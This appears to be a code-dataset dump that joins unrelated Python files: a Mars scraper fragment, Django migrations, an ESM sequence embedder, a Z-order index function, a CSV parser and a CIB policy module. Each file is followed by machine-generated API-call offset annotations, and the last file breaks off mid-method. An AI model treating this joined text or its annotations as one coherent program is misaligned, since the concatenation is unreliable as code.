    # Create a dictionary with all the scraped data to return
    dict_of_scraped = {
        "news_title_list": news_title_list,
        "news_p_list": news_p_list,
        "featured_image_url": featured_image_url,
        "mars_weather": mars_weather,
        "html_table_str": html_table_str,
        "hemisphere_image_urls": hemisphere_image_urls
    }

    return dict_of_scraped
"bs4.BeautifulSoup",
"pandas.read_html",
"requests.get"
] | [((1549, 1566), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (1561, 1566), False, 'import requests\n'), ((1580, 1612), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (1582, 1612), True, 'from bs4 import BeautifulSoup as bs\n'), ((2160, 2185), 'requests.get', 'requests.get', (['jplmars_url'], {}), '(jplmars_url)\n', (2172, 2185), False, 'import requests\n'), ((2207, 2239), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (2209, 2239), True, 'from bs4 import BeautifulSoup as bs\n'), ((2690, 2715), 'requests.get', 'requests.get', (['twitter_url'], {}), '(twitter_url)\n', (2702, 2715), False, 'import requests\n'), ((2737, 2769), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (2739, 2769), True, 'from bs4 import BeautifulSoup as bs\n'), ((3083, 3111), 'pandas.read_html', 'pd.read_html', (['spacefacts_url'], {}), '(spacefacts_url)\n', (3095, 3111), True, 'import pandas as pd\n'), ((3395, 3424), 'requests.get', 'requests.get', (['hemispheres_url'], {}), '(hemispheres_url)\n', (3407, 3424), False, 'import requests\n'), ((3449, 3481), 'bs4.BeautifulSoup', 'bs', (['response.text', '"""html.parser"""'], {}), "(response.text, 'html.parser')\n", (3451, 3481), True, 'from bs4 import BeautifulSoup as bs\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-08 16:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add a nullable ``medico`` foreign key to ``Paciente``.

    The FK uses on_delete=PROTECT, so a Medico with linked patients
    cannot be deleted.
    """
    dependencies = [
        ('medicos', '0001_initial'),
        ('pacientes', '0005_auto_20171202_1917'),
    ]
    operations = [
        migrations.AddField(
            model_name='paciente',
            name='medico',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='medicos.Medico'),
        ),
    ]
| [
"django.db.models.ForeignKey"
] | [((473, 571), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.PROTECT', 'to': '"""medicos.Medico"""'}), "(null=True, on_delete=django.db.models.deletion.PROTECT,\n to='medicos.Medico')\n", (490, 571), False, 'from django.db import migrations, models\n')] |
__all__ = ["SequenceEmbedder"]
from os import PathLike
from pathlib import Path
from typing import List, Tuple
import esm
import torch
from sklearn.decomposition import PCA
from torch.utils.data import DataLoader
from src.path import ROOT_PATH
PCA_PATH = Path(ROOT_PATH, "data", "processed", "pca_train.pt")
class SequenceEmbedder:
    """Embed protein sequences with a pretrained ESM model.

    Per-residue ESM representations are projected down to ``embedding_size``
    dimensions with a PCA model previously fitted on training data and
    loaded from ``PCA_PATH``.
    """
    def __init__(self, max_sequence_len: int = 30, embedding_size: int = 60) -> None:
        """Load the trained PCA and the pretrained ESM model.

        Raises
        ------
        FileNotFoundError
            If the serialized PCA model is missing on disk.
        """
        if not PCA_PATH.exists():
            raise FileNotFoundError("Trained PCA does not exist!")
        # PCA fitted offline and serialized with torch.save.
        self.trained_pca: PCA = torch.load(PCA_PATH)
        self.model, self.alphabet = esm.pretrained.load_model_and_alphabet(
            "esm1_t6_43M_UR50S"
        )
        # Inference only: disable dropout/batch-norm updates.
        self.model.eval()
        # num_layers % (num_layers + 1) == num_layers, i.e. the representations
        # of the final transformer layer are extracted in embed().
        self.repr_layer = self.model.num_layers % (self.model.num_layers + 1)
        self.max_sequence_len = max_sequence_len
        self.embedding_size = embedding_size
    @torch.no_grad()
    def embed(self, fasta_file: PathLike) -> Tuple[List[str], torch.Tensor]:
        """Embeds the sequences listed in the input file, returning a list of strings and a batch of N×L×E dimensions,
        where N is the number of sequences in FASTA, L is the maximum sequence length, and E is the embedding size.
        Parameters
        ----------
        fasta_file : os.PathLike
        Returns
        -------
        Tuple[List[str], torch.Tensor]
        """
        # Generate dataset from FASTA file
        dataset = esm.FastaBatchedDataset.from_file(fasta_file)
        batches = dataset.get_batch_indices(toks_per_batch=4096, extra_toks_per_seq=1)
        dataloader = DataLoader(
            dataset,
            collate_fn=self.alphabet.get_batch_converter(),
            batch_sampler=batches,
        )
        # Keyed by sequence string, so duplicate sequences collapse to one entry.
        x = {}
        for labels, sequences, toks in dataloader:
            # Truncate (presumably to the ESM model's max input length -- TODO confirm)
            toks = toks[:, :1022]
            # Generate representations
            out = self.model(toks, repr_layers=[self.repr_layer], return_contacts=False)
            representations = out["representations"][self.repr_layer]
            for i, sequence in enumerate(sequences):
                sequence_len = len(sequence)
                # Slice starts at 1, skipping the leading special token added by
                # the batch converter (assumed BOS -- verify against esm docs).
                representation = representations[i, 1 : sequence_len + 1]
                # Zero-pad each sequence to a fixed (max_sequence_len, embedding_size) shape.
                embedding = torch.zeros((self.max_sequence_len, self.embedding_size))
                embedding[:sequence_len, :] = torch.Tensor(
                    self.trained_pca.transform(representation)
                )
                x[sequence] = embedding
        batch = torch.stack(tuple(x.values()))
        return list(x.keys()), batch
| [
"esm.FastaBatchedDataset.from_file",
"pathlib.Path",
"torch.load",
"esm.pretrained.load_model_and_alphabet",
"torch.no_grad",
"torch.zeros"
] | [((259, 311), 'pathlib.Path', 'Path', (['ROOT_PATH', '"""data"""', '"""processed"""', '"""pca_train.pt"""'], {}), "(ROOT_PATH, 'data', 'processed', 'pca_train.pt')\n", (263, 311), False, 'from pathlib import Path\n'), ((900, 915), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (913, 915), False, 'import torch\n'), ((557, 577), 'torch.load', 'torch.load', (['PCA_PATH'], {}), '(PCA_PATH)\n', (567, 577), False, 'import torch\n'), ((614, 673), 'esm.pretrained.load_model_and_alphabet', 'esm.pretrained.load_model_and_alphabet', (['"""esm1_t6_43M_UR50S"""'], {}), "('esm1_t6_43M_UR50S')\n", (652, 673), False, 'import esm\n'), ((1445, 1490), 'esm.FastaBatchedDataset.from_file', 'esm.FastaBatchedDataset.from_file', (['fasta_file'], {}), '(fasta_file)\n', (1478, 1490), False, 'import esm\n'), ((2258, 2315), 'torch.zeros', 'torch.zeros', (['(self.max_sequence_len, self.embedding_size)'], {}), '((self.max_sequence_len, self.embedding_size))\n', (2269, 2315), False, 'import torch\n')] |
import sys
def solution(n, r, c):
    """Return the 0-based visit index of cell (r, c) when a 2**n x 2**n grid
    is traversed in Z-order (recursively: upper-left, upper-right,
    lower-left, lower-right quadrant).

    Parameters
    ----------
    n : int
        Recursion depth; the grid has side length 2**n.
    r, c : int
        Row and column of the target cell.

    Fix: use integer floor division (``// 2``) instead of ``int(r / 2)``.
    True division goes through a float, which silently loses precision for
    coordinates at or above 2**53 and yields a wrong index.
    """
    if n == 0:
        return 0
    # Offset within the current 2x2 quadrant (row bit weighs 2, column bit 1),
    # plus 4x the index of that quadrant in the next level up.
    return 2 * (r % 2) + (c % 2) + 4 * solution(n - 1, r // 2, c // 2)
if __name__ == "__main__":
    # Read "n r c" from a single stdin line and print the Z-order visit index.
    n, r, c = map(int, sys.stdin.readline().split())
    print(solution(n, r, c))
| [
"sys.stdin.readline"
] | [((199, 219), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (217, 219), False, 'import sys\n')] |
import csv
import six
DAYS = ('mon', 'tue', 'wed', 'thu', 'fri')
SQUARE_DAYS = ('mon', 'tue', 'wed')
DOUBLE_DAYS = ('thu', 'fri')
DAY_TO_NUMBER = {day: i for i, day in enumerate(DAYS)}
NUMBER_TO_DAY = {i: day for i, day in enumerate(DAYS)}
def parse_week(filename):
    """
    Open an input CSV file, parse it and return its per-day data.

    Returns a list of per-day dictionaries ordered mon..fri; days with no
    data in the file are omitted.
    """
    week_data = {}
    with open(filename) as csv_file:
        reader = csv.DictReader(csv_file)
        for row in reader:
            # NOTE(review): week_data is reassigned on every row, so only the
            # last CSV row survives -- confirm multi-row inputs are not expected.
            week_data = parse_row(row)
    return [week_data[day] for day in DAYS if week_data.get(day) is not None]
def parse_row(row):
    """
    Parse a row from an input CSV file and return its data.

    The expected input format is a dictionary of column_names -> column_values.
    A column name may be a single day ('mon'), an inclusive day range
    ('mon-wed'), or 'description'; any other column is ignored.

    Modernization: the ``six`` shims (``iteritems``, ``moves.xrange``) are
    replaced with the built-in ``dict.items()`` and ``range``, which behave
    identically here.
    """
    week_data = {}
    description = None
    for column, value in row.items():
        if column == 'description':
            description = value
        elif column in DAYS:
            week_data[column] = {'day': column, 'value': int(value)}
        elif column is not None and '-' in column:
            # A range column such as 'mon-wed' applies its value to every
            # day in the (inclusive) span; unknown day names are skipped.
            start, end = column.split('-')
            start, end = DAY_TO_NUMBER.get(start), DAY_TO_NUMBER.get(end)
            if start is not None and end is not None:
                for number in range(start, end + 1):
                    day = NUMBER_TO_DAY[number]
                    week_data[day] = {'day': day, 'value': int(value)}
    populate_extra_data(week_data, description)
    return week_data
def populate_extra_data(week_data, description):
    """
    Once the daily data has been collected, append the derived value and the
    description to every day entry, mutating ``week_data`` in place.

    Days in SQUARE_DAYS (mon-wed) get a 'square' key (value ** 2); days in
    DOUBLE_DAYS (thu, fri) get a 'double' key (value * 2). The description
    string has the derived value appended.

    Modernization: ``six.iteritems`` is replaced with the built-in
    ``dict.items()``, which behaves identically here.
    """
    for day, day_week_data in week_data.items():
        value = day_week_data['value']
        # Every key produced by parse_row is in DAYS = SQUARE_DAYS + DOUBLE_DAYS,
        # so exactly one branch runs and extra_value is always bound below.
        if day in SQUARE_DAYS:
            extra_value = value ** 2
            day_week_data['square'] = extra_value
        elif day in DOUBLE_DAYS:
            extra_value = value * 2
            day_week_data['double'] = extra_value
        day_week_data['description'] = '{} {}'.format(description, extra_value)
| [
"six.moves.xrange",
"six.iteritems",
"csv.DictReader"
] | [((840, 858), 'six.iteritems', 'six.iteritems', (['row'], {}), '(row)\n', (853, 858), False, 'import six\n'), ((1716, 1740), 'six.iteritems', 'six.iteritems', (['week_data'], {}), '(week_data)\n', (1729, 1740), False, 'import six\n'), ((423, 447), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (437, 447), False, 'import csv\n'), ((1279, 1311), 'six.moves.xrange', 'six.moves.xrange', (['start', '(end + 1)'], {}), '(start, end + 1)\n', (1295, 1311), False, 'import six\n')] |
# Generated by Django 3.1.13 on 2021-11-28 12:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the nutrition app.

    Creates three models, each linked to the user model:
    - PeriodoMenstrual (one-to-one with the user)
    - IndicadorBioquimico (many per user)
    - Cita (many per user)
    """
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='PeriodoMenstrual',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('dias_menstruacion', models.CharField(blank=True, max_length=2, null=True)),
                ('fecha_ultima_menstruacion', models.DateField(blank=True, null=True)),
                ('sintomas_antes', models.CharField(blank=True, max_length=100, null=True)),
                ('sintomas_despues', models.CharField(blank=True, max_length=100, null=True)),
                ('embarazo', models.BooleanField(default=False)),
                ('anticonceptivos', models.BooleanField(default=False)),
                ('anticonceptivos_cuales', models.CharField(blank=True, max_length=100, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_periodo_mestrual', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='IndicadorBioquimico',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fecha', models.DateField()),
                ('colesterol', models.CharField(blank=True, max_length=10, null=True)),
                ('trigliceridos', models.CharField(blank=True, max_length=10, null=True)),
                ('hdl', models.CharField(blank=True, max_length=10, null=True)),
                ('ldl', models.CharField(blank=True, max_length=10, null=True)),
                ('glucosa_ayunas', models.CharField(blank=True, max_length=10, null=True)),
                ('hemoglobina', models.CharField(blank=True, max_length=10, null=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_indicadores_bioquimicos', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Cita',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fecha', models.DateTimeField()),
                # NOTE(review): 'diaganotico' is a misspelling of 'diagnostico',
                # but it is the persisted column name -- renaming requires a
                # follow-up migration, not an edit here.
                ('diaganotico', models.TextField()),
                ('completada', models.BooleanField(default=False)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nutri_paciente_cita', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"django.db.models.OneToOneField",
"django.db.models.DateField",
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((248, 305), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (279, 305), False, 'from django.db import migrations, models\n'), ((446, 539), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (462, 539), False, 'from django.db import migrations, models\n'), ((576, 629), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(2)', 'null': '(True)'}), '(blank=True, max_length=2, null=True)\n', (592, 629), False, 'from django.db import migrations, models\n'), ((678, 717), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (694, 717), False, 'from django.db import migrations, models\n'), ((755, 810), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (771, 810), False, 'from django.db import migrations, models\n'), ((850, 905), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (866, 905), False, 'from django.db import migrations, models\n'), ((937, 971), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (956, 971), False, 'from django.db import migrations, models\n'), ((1010, 1044), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1029, 1044), False, 'from django.db import migrations, models\n'), ((1090, 1145), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), 
'(blank=True, max_length=100, null=True)\n', (1106, 1145), False, 'from django.db import migrations, models\n'), ((1173, 1324), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_periodo_mestrual"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE,\n related_name='nutri_paciente_periodo_mestrual', to=settings.AUTH_USER_MODEL\n )\n", (1193, 1324), False, 'from django.db import migrations, models\n'), ((1460, 1553), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1476, 1553), False, 'from django.db import migrations, models\n'), ((1578, 1596), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (1594, 1596), False, 'from django.db import migrations, models\n'), ((1630, 1684), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1646, 1684), False, 'from django.db import migrations, models\n'), ((1721, 1775), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1737, 1775), False, 'from django.db import migrations, models\n'), ((1802, 1856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1818, 1856), False, 'from django.db import migrations, models\n'), ((1883, 1937), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1899, 1937), False, 'from django.db import migrations, models\n'), ((1975, 
2029), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (1991, 2029), False, 'from django.db import migrations, models\n'), ((2064, 2118), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)'}), '(blank=True, max_length=10, null=True)\n', (2080, 2118), False, 'from django.db import migrations, models\n'), ((2146, 2297), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_indicadores_bioquimicos"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='nutri_paciente_indicadores_bioquimicos', to=settings.AUTH_USER_MODEL)\n", (2163, 2297), False, 'from django.db import migrations, models\n'), ((2422, 2515), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2438, 2515), False, 'from django.db import migrations, models\n'), ((2540, 2562), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2560, 2562), False, 'from django.db import migrations, models\n'), ((2597, 2615), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2613, 2615), False, 'from django.db import migrations, models\n'), ((2649, 2683), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2668, 2683), False, 'from django.db import migrations, models\n'), ((2711, 2843), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""nutri_paciente_cita"""', 'to': 'settings.AUTH_USER_MODEL'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n 
='nutri_paciente_cita', to=settings.AUTH_USER_MODEL)\n", (2728, 2843), False, 'from django.db import migrations, models\n')] |
import bisect
import copy
import hashlib
import itertools
import json
import operator
import time
from collections import ChainMap
import pmdefaults as PM
from pmdefaults import *
from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator
CIB_EXPIRED = 2
class CIBEntryError(Exception):
    """Raised for invalid CIB node data or an already-expired CIB node.

    Expired nodes carry CIB_EXPIRED in ``args`` so callers can tell the
    two cases apart.
    """
    pass
def load_json(filename):
    """
    Read a CIB node from a JSON file.

    Returns the parsed object (normally a dict), or None when the file
    does not contain valid JSON.

    Fix: open the file with a context manager -- the original leaked the
    file handle on both the success and the error path.
    """
    with open(filename, 'r') as cib_file:
        try:
            return json.load(cib_file)
        except json.decoder.JSONDecodeError as e:
            logging.error("Could not parse CIB file " + filename)
            print(e)
            return None
class CIBNode(object):
    """A single node of the Characteristics Information Base (CIB).

    A node wraps a PropertyMultiArray of NEAT properties plus metadata
    (uid, priority, expiry, description) and ``match`` rules that link it
    to other nodes.  ``root`` nodes are expanded into flat CIB rows by
    following those links.
    """
    # Class-level back-reference to the owning CIB instance; set in CIB.__init__.
    cib = None
    def __init__(self, node_dict=None):
        """Build a node from a (JSON-derived) dict.

        Raises CIBEntryError for non-dict input or an already-expired node.
        """
        if node_dict is None:
            node_dict = dict()
        if not isinstance(node_dict, dict):
            raise CIBEntryError("invalid CIB object")
        self.root = node_dict.get('root', False)
        # otherwise chain matched CIBs
        self.link = node_dict.get('link', False)
        self.priority = node_dict.get('priority', 0)
        # TTL for the CIB node: the node is considered invalid after the time specified
        self.expire = node_dict.get('expire', None) or node_dict.get('expires', None) # FIXME expires is deprecated
        self.filename = node_dict.get('filename', None)
        self.description = node_dict.get('description', '')
        # convert to PropertyMultiArray with NEATProperties
        properties = node_dict.get('properties', [])
        if not isinstance(properties, list):
            # properties should be in a list. The list elements are expanded when generating the CIB rows.
            properties = [properties]
        self.properties = PropertyMultiArray()
        for p in properties:
            if isinstance(p, list):
                self.properties.add([PropertyArray.from_dict(ps) for ps in p])
            else:
                self.properties.add(PropertyArray.from_dict(p))
        self.match = []
        # FIXME better error handling if match undefined
        for l in node_dict.get('match', []):
            # convert to NEATProperties
            self.match.append(PropertyArray.from_dict(l))
        # uids of nodes this node points at; filled by update_links_from_match().
        self.linked = set()
        if self.link and not self.match:
            logging.warning('link attribute set but no match field!')
        self.uid = node_dict.get('uid')
        if self.uid is None:
            self.uid = self._gen_uid()
    def dict(self):
        """Serialize the node back into a plain dict (inverse of __init__)."""
        d = {}
        for attr in ['uid', 'root', 'link', 'priority', 'filename', 'description', 'expire', ]:
            try:
                d[attr] = getattr(self, attr)
            except AttributeError:
                logging.debug("CIB node doesn't contain attribute %s" % attr)
        if self.match:
            d['match'] = []
            for m in self.match:
                d['match'].append(m.dict())
        d['properties'] = self.properties.list()
        return d
    @property
    def expire(self):
        # Absolute expiry timestamp (seconds since epoch); -1 means "never".
        return self._expire
    @expire.setter
    def expire(self, value):
        """Set the expiry time; raises CIBEntryError(CIB_EXPIRED) for past timestamps."""
        if value is None:
            # No expiry given: fall back to the configured default timeout.
            self._expire = time.time() + CIB_DEFAULT_TIMEOUT
            return
        value = float(value)
        if value == -1:
            # does not expire
            self._expire = value
        elif time.time() > value:
            raise CIBEntryError('ignoring expired CIB node', CIB_EXPIRED)
        else:
            self._expire = value
    def _gen_uid(self):
        """Derive a uid as the md5 of the node's canonical JSON (volatile fields removed)."""
        # FIXME generate persistent UIDs
        d = self.dict()
        for k in ['expire', 'filename', 'uid', ]:
            try:
                del d[k]
            except KeyError:
                pass
        s = json.dumps(d, indent=0, sort_keys=True)
        return hashlib.md5(s.encode('utf-8')).hexdigest()
    def json(self, indent=4):
        """Return the node serialized as a JSON string."""
        return json.dumps(self.dict(), indent=indent, sort_keys=True)
    def resolve_paths(self, path=None):
        """recursively find all paths from this CIBNode to all other matched CIBnodes in the CIB graph"""
        # NOTE(review): near-duplicate of resolve_links() below (and it recurses
        # into resolve_links, not into itself) -- candidates for consolidation.
        if path is None:
            path = []
        # insert own index based on CIB node priority to resolve overlapping properties later
        # FIXME priorities no longer work
        pos = bisect.bisect([self.cib[uid].priority for uid in path], self.priority)
        path.insert(pos, self.uid)
        # no more links to check
        if not (self.linked - set(path)):
            return [path]
        new_paths = []
        for uid in self.linked:
            if uid in path:
                continue
            new_paths.extend(self.cib[uid].resolve_links(path.copy()))
        return new_paths
    def match_entry(self, entry):
        """Return True if any of this node's match rules is a subset of *entry*."""
        for match_properties in self.match:
            if match_properties <= entry:
                return True
        return False
    def expand(self):
        """Yield every PropertyArray combination of this node's properties."""
        for p in self.properties.expand():
            yield p
    def update_links_from_match(self):
        """
        Look at the list elements in self.match and try to match all of its properties to another CIB entry. Generates a
        list containing the UIDs of the matched rows. The list is stored in self.linked.
        """
        for match_properties in self.match:
            for node in self.cib.nodes.values():
                if node.uid == self.uid: continue # ??
                for p in node.expand():
                    # Check if the properties in the match list are a full subset of some CIB properties.
                    # Also include the CIB uid as a property while matching
                    if match_properties <= set(p.values()) | {NEATProperty(('uid', node.uid))}:
                        self.linked.add(node.uid)
    def resolve_graph(self, path=None):
        """Walk CIB.graph depth-first from this node and return all simple paths."""
        if path is None:
            path = []
        path.append(self.uid)
        remaining = set(self.cib.graph.get(self.uid, [])) - set(path)
        if len(remaining) == 0:
            return [path]
        new_paths = []
        for u in remaining:
            paths = self.cib.nodes[u].resolve_graph(path.copy())
            new_paths.extend(paths)
        return new_paths
    def resolve_links(self, path=None):
        """find paths from current CIB to all linked CIBS """
        if path is None:
            path = []
        # insert own index based on CIB node priority to resolve overlapping properties later
        pos = bisect.bisect([self.cib[uid].priority for uid in path], self.priority)
        path.insert(pos, self.uid)
        # no more links to check
        if not (self.linked - set(path)):
            return [path]
        new_paths = []
        for uid in self.linked:
            if uid in path:
                continue
            new_paths.extend(self.cib[uid].resolve_links(path.copy()))
        return new_paths
    def expand_rows(self, apply_extended=True):
        """Generate CIB rows by expanding all CIBs pointing to current CIB """
        paths = self.resolve_graph()
        # for storing expanded rows
        rows = []
        for path in paths:
            expanded_properties = (self.cib[uid].expand() for uid in path)
            # Cartesian product over each node's property expansions along the path.
            for pas in itertools.product(*expanded_properties):
                chain = ChainMap(*pas)
                # For debugging purposes, add the path list to the chain.
                # Store as string to preserve path order (NEAT properties are not ordered).
                dbg_path = '<<'.join(uid for uid in path)
                # insert at position 0 to override any existing entries
                # chain.maps.insert(0, PropertyArray(NEATProperty(('cib_uids', dbg_path))))
                # convert back to normal PropertyArrays
                row = PropertyArray(*(p for p in chain.values()))
                row.meta['cib_uids'] = dbg_path
                rows.append(row)
        if not apply_extended:
            return rows
        if not self.cib.extenders:
            # no extender CIB nodes loaded
            return rows
        # TODO optimize
        extended_rows = rows.copy()
        for entry in rows:
            # TODO take priorities into account
            # iterate extender cib_nodes
            for uid, xs in self.cib.extenders.items():
                for pa in xs.expand():
                    if xs.match_entry(entry):
                        entry_copy = copy.deepcopy(entry)
                        # Extender properties (pa) take precedence over the entry copy.
                        chain = ChainMap(pa, entry_copy)
                        new_pa = PropertyArray(*(p for p in chain.values()))
                        try:
                            del new_pa['uid']
                        except KeyError:
                            pass
                        extended_rows.append(new_pa)
        return extended_rows
    def __repr__(self):
        s = str(self.properties)
        if self.linked:
            s += " linked@%s" % self.linked
        return s
class CIB(object):
    """
    Internal representation of the CIB for testing.

    Loads CIBNode files from a directory, keeps them keyed by uid, and
    resolves the link graph between them so root nodes can be expanded
    into flat rows for lookups.
    """
    cib_dir = PM.CIB_DIR
    CIB_EXTENSIONS = ('.cib', '.local', '.connection', '.remote', '.slim')
    def __init__(self, cib_dir=None):
        # dictionary containing all loaded CIB nodes, keyed by their uid
        self.nodes = {}
        # track CIB files (path -> st_mtime_ns at load time)
        self.files = dict()
        CIBNode.cib = self
        self.graph = {}
        if cib_dir:
            self.cib_dir = cib_dir
        self.reload_files()
    def __getitem__(self, uid):
        return self.nodes[uid]
    def items(self):
        return self.nodes.items()
    def keys(self):
        return self.nodes.keys()
    def values(self):
        return self.nodes.values()
    @property
    def roots(self):
        """Nodes flagged as roots; only these are expanded into rows."""
        return {k: v for k, v in self.nodes.items() if v.root is True}
    @property
    def extenders(self):
        """Non-link nodes, applied on top of expanded rows in expand_rows()."""
        return {k: v for k, v in self.nodes.items() if not v.link}
    @property
    def rows(self):
        """
        Returns a generator containing all expanded root CIB nodes
        """
        for uid, r in self.roots.items():
            # expand all cib nodes
            for entry in r.expand_rows():
                entry.cib_node = uid
                yield entry
    def reload_files(self, cib_dir=None):
        """
        Reload CIB files when a change is detected on disk.

        New and modified files (by mtime) are (re)loaded; nodes whose
        backing file disappeared are dropped. The link graph is rebuilt
        afterwards.
        """
        if not cib_dir:
            cib_dir = self.cib_dir
        full_names = set()
        logging.info("checking for CIB updates...")
        if not os.path.exists(cib_dir):
            sys.exit('CIB directory %s does not exist' % cib_dir)
        for dirpath, dirnames, filenames in os.walk(cib_dir):
            for filename in filenames:
                # Skip non-CIB extensions and hidden/backup files.
                if not filename.endswith(CIB.CIB_EXTENSIONS) or filename.startswith(('.', '#')):
                    continue
                full_name = os.path.join(dirpath, filename)
                stat = os.stat(full_name)
                full_names.add(full_name)
                if full_name in self.files:
                    if self.files[full_name] != stat.st_mtime_ns:
                        logging.info("CIB node %s has changed", full_name)
                        self.files[full_name] = stat.st_mtime_ns
                        self.load_cib_file(full_name)
                else:
                    logging.info("Loading new CIB node %s.", full_name)
                    self.files[full_name] = stat.st_mtime_ns
                    self.load_cib_file(full_name)
        removed_files = self.files.keys() - full_names
        for filename in removed_files:
            logging.info("CIB node %s has been removed", filename)
            del self.files[filename]
            deleted_cs = [cs for cs in self.nodes.values() if cs.filename == filename]
            # remove corresponding CIBNode object
            for cs in deleted_cs:
                # Fix: was self.nodes.pop(uid, None) -- 'uid' is undefined in
                # this scope and raised NameError whenever a file was removed.
                self.nodes.pop(cs.uid, None)
        self.update_graph()
    def load_cib_file(self, filename):
        """Parse *filename* into a CIBNode and register it; log and skip on errors."""
        cs = load_json(filename)
        if not cs:
            logging.warning("CIB node file %s was invalid" % filename)
            return
        try:
            cib_node = CIBNode(cs)
        except CIBEntryError as e:
            if CIB_EXPIRED in e.args:
                logging.debug("Ignoring CIB node %s: %s" % (filename, e.args[0]))
                return
            logging.error("Unable to load CIB node %s: %s" % (filename, e.args[0]))
            return
        cib_node.filename = filename
        self.register(cib_node)
    def update_graph(self):
        """Rebuild the reverse link graph (target uid -> list of linking uids)."""
        # FIXME this tree should be rebuilt dynamically
        # update links for all registered CIBs
        for cs in self.nodes.values():
            cs.update_links_from_match()
        # FIXME check for invalid pointers
        self.graph = {}
        for i in self.nodes.values():
            if not i.link:
                continue
            for r in i.linked:
                if r not in self.graph:
                    self.graph[r] = []
